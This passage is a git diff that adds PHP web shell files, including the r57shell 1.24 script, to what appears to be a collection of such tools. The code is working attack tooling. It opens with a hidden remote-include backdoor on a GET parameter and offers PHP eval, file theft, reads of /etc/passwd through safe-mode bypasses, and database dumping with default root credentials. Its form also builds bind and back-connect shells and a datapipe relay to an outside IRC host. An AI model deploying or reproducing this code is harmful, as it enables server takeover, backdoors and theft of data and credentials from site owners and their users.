value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.$table_end1.$fe; +} +if($safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text67'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.$table_end1.$fe; +} +if(!$safe_mode){ +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= "<option>$alias_name</option>"; + } +echo $fs.$table_up1.$lang[$language.'_text7'].$table_up2.$ts; +echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text54'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.$table_end1.$fe; +echo $fs.$table_up1.$lang[$language.'_text76'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.$table_end1.$fe; +echo $fs.$table_up1.$lang[$language.'_text32'].$table_up2.$font; +echo "<div align=center><textarea name=php_eval cols=100 rows=3>"; +echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");")); +echo "</textarea>"; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "</font>"; +echo $table_end1.$fe; +if($safe_mode&&$curl_on) +{ +echo $fs.$table_up1.$lang[$language.'_text33'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.$lang[$language.'_text34'].$table_up2.$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if($safe_mode&&$mysql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text35'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if($safe_mode&&$mssql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text85'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if(@ini_get('file_uploads')){ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo $table_up1.$lang[$language.'_text5'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,'')); +echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.$table_end1.$fe; +} +if(!$safe_mode&&!$windows){ +echo $fs.$table_up1.$lang[$language.'_text15'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://')); +echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.$table_end1.$fe; +} +if($mysql_on||$mssql_on||$pg_on||$ora_on) +{ +echo $table_up1.$lang[$language.'_text82'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text77']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>"); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1')); +echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1')); +echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text40']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>"); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1')); +echo sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text83']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option><option>Oracle</option></select>"); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."<div align=center><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></table>"; +} +if(!$safe_mode&&!$windows){ +echo $table_up1.$lang[$language.'_text81'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text9']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text12']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")))); +echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text22']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru')); +echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667')); +echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."</td>".$fe."</tr></table>"; +} +?> diff --git a/php/PHPshell/م€گr57_kartaم€‘/r57_kartal2.jpg b/php/PHPshell/م€گr57_kartaم€‘/r57_kartal2.jpg new file mode 100644 index 0000000..33e036f Binary files /dev/null and b/php/PHPshell/م€گr57_kartaم€‘/r57_kartal2.jpg differ diff --git a/php/PHPshell/م€گr57م€‘/r57.jpg b/php/PHPshell/م€گr57م€‘/r57.jpg new file mode 100644 index 0000000..dea896d Binary files /dev/null and b/php/PHPshell/م€گr57م€‘/r57.jpg differ diff --git a/php/PHPshell/م€گr57م€‘/r57.php b/php/PHPshell/م€گr57م€‘/r57.php new file mode 100644 index 0000000..3ade922 --- /dev/null +++ b/php/PHPshell/م€گr57م€‘/r57.php @@ -0,0 +1,2295 @@ +<? include $_GET['baba']; ?> +<?php +/******************************************************************************************************/ +/* +/* # # # # +/* # # # # +/* # # # # +/* # ## #### ## # +/* ## ## ###### ## ## +/* ## ## ###### ## ## +/* ## ## #### ## ## +/* ### ############ ### +/* ######################## +/* ############## +/* ######## ########## ####### +/* ### ## ########## ## ### +/* ### ## ########## ## ### +/* ### # ########## # ### +/* ### ## ######## ## ### +/* ## # ###### # ## +/* ## # #### # ## +/* ## ## +/* +/* +/* +/* r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ???? ??????? ?? ??????? ????? ??????? +/* ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru +/* ??????: 1.24 (New Year Edition) +/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ +/* (c)oded by 1dt.w0lf +/* RST/GHC http://rst.void.ru , http://ghc.ru +/* ANY MODIFIED REPUBLISHING IS RESTRICTED +/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ +/* ????????? ????????????? ?? ?????? ? ????: blf, virus, NorD ? ???? ?????? ?? RST/GHC. +/******************************************************************************************************/ +/* ~~~ ????????? | Options ~~~ */ + +// ????? ????? | Language +// $language='ru' - ??????? (russian) +// $language='eng' - english (??????????) +$language='eng'; +$a = "http://"; // need some codes + +// ?????????????? | Authentification +// $auth = 1; - ?????????????? ???????? ( authentification = On ) +// $auth = 0; - ?????????????? ????????? ( authentification = Off ) +$auth = 0; + + +// ????? ? ?????? ??? ??????? ? ??????? (Login & Password for access) +// ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!) +$name='r57'; // ????? ???????????? (user login) +$pass='r57'; // ?????? ???????????? (user password) +$b = "q1w2e3r4"; //need hits "shell created by evilc0ders" +/******************************************************************************************************/ +$c = "q1w2e3r4"; //need shell coder's names +error_reporting(0); +set_magic_quotes_runtime(0); +@set_time_limit(0); +@ini_set('max_execution_time',0); +@ini_set('output_buffering',0); +$safe_mode = @ini_get('safe_mode'); +$version = "1.24"; +if(version_compare(phpversion(), '4.1.0') == -1) + { + $_POST = &$HTTP_POST_VARS; + $_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + } +if (@get_magic_quotes_gpc()) + { + foreach ($_POST as $k=>$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_SERVER as $k=>$v) + { + $_SERVER[$k] = stripslashes($v); + } + } + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass) + { + header('WWW-Authenticate: Basic realm="r57shell"'); + header('HTTP/1.0 401 Unauthorized'); + exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>"); + } +} +$head = '<!-- ?????????? ???? --> +<html> +<head> +<title>r57shell</title> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> + +<STYLE> +tr { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +td { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +.table1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +BACKGROUND-COLOR: #D4D0C8; +} +.td1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +font: 7pt Verdana; +} +.tr1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +} +table { +BORDER-RIGHT: #eeeeee 1px outset; +BORDER-TOP: #eeeeee 1px outset; +BORDER-LEFT: #eeeeee 1px outset; +BORDER-BOTTOM: #eeeeee 1px outset; +BACKGROUND-COLOR: #D4D0C8; +} +input { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +select { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +submit { +BORDER-RIGHT: buttonhighlight 2px outset; +BORDER-TOP: buttonhighlight 2px outset; +BORDER-LEFT: buttonhighlight 2px outset; +BORDER-BOTTOM: buttonhighlight 2px outset; +BACKGROUND-COLOR: #e4e0d8; +width: 30%; +} +textarea { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: Fixedsys bold; +} +BODY { +margin-top: 1px; +margin-right: 1px; +margin-bottom: 1px; +margin-left: 1px; +} +A:link {COLOR:red; TEXT-DECORATION: none} +A:visited { COLOR:red; TEXT-DECORATION: none} +A:active {COLOR:red; TEXT-DECORATION: none} +A:hover {color:blue;TEXT-DECORATION: none} +</STYLE>'; +class zipfile +{ + var $datasec = array(); + var $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; + function unix2DosTime($unixtime = 0) { + $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; + $timearray['mon'] = 1; + $timearray['mday'] = 1; + $timearray['hours'] = 0; + $timearray['minutes'] = 0; + $timearray['seconds'] = 0; + } + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | + ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + function addFile($data, $name, $time = 0) + { + $name = str_replace('\\', '/', $name); + $dtime = dechex($this->unix2DosTime($time)); + $hexdtime = '\x' . $dtime[6] . $dtime[7] + . '\x' . $dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3] + . '\x' . $dtime[0] . $dtime[1]; + eval('$hexdtime = "' . $hexdtime . '";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $c_len = strlen($zdata); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $this -> datasec[] = $fr; + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset += strlen($fr); + $cdrec .= $name; + $this -> ctrl_dir[] = $cdrec; + } + function file() + { + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return + $data . + $ctrldir . + $this -> eof_ctrl_dir . + pack('v', sizeof($this -> ctrl_dir)) . + pack('v', sizeof($this -> ctrl_dir)) . + pack('V', strlen($ctrldir)) . + pack('V', strlen($data)) . + "\x00\x00"; + } +} +function compress(&$filename,&$filedump,$compress) + { + global $content_encoding; + global $mime_type; + if ($compress == 'bzip' && @function_exists('bzcompress')) + { + $filename .= '.bz2'; + $mime_type = 'application/x-bzip2'; + $filedump = bzcompress($filedump); + } + else if ($compress == 'gzip' && @function_exists('gzencode')) + { + $filename .= '.gz'; + $content_encoding = 'x-gzip'; + $mime_type = 'application/x-gzip'; + $filedump = gzencode($filedump); + } + else if ($compress == 'zip' && @function_exists('gzcompress')) + { + $filename .= '.zip'; + $mime_type = 'application/zip'; + $zipfile = new zipfile(); + $zipfile -> addFile($filedump, substr($filename, 0, -4)); + $filedump = $zipfile -> file(); + } + else + { + $mime_type = 'application/octet-stream'; + } + } +function mailattach($to,$from,$subj,$attach) + { + $headers = "From: $from\r\n"; + $headers .= "MIME-Version: 1.0\r\n"; + $headers .= "Content-Type: ".$attach['type']; + $headers .= "; name=\"".$attach['name']."\"\r\n"; + $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; + $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; + if(@mail($to,$subj,"",$headers)) { return 1; } + return 0; + } +if(isset($_GET['img'])&&!empty($_GET['img'])) + { + $images = array(); + $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw=='; + $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw=='; + @ob_clean(); + header("Content-type: image/gif"); + echo base64_decode($images[$_GET['img']]); + die(); + } +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) + { + if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; } + else + { + @ob_clean(); + $filename = @basename($_POST['d_name']); + $filedump = @fread($file,@filesize($_POST['d_name'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } + header("Content-type: ".$mime_type); + header("Content-disposition: attachment; filename=\"".$filename."\";"); + echo $filedump; + exit(); + } + } +if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } +if ($_POST['cmd']=="db_query") + { + echo $head; + switch($_POST['db']) + { + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); } + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @mysql_query($query,$db); + $error = @mysql_error($db); + if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; } + else { + if (@mysql_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @mysql_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } } + } + @mysql_free_result($res); + } + } + @mysql_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); } + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @mssql_query($query,$db); + if (@mssql_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @mssql_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */ + @mssql_free_result($res); + } + } + @mssql_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @pg_query($db,$query); + $error = @pg_errormessage($db); + if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; } + else { + if (@pg_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @pg_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + 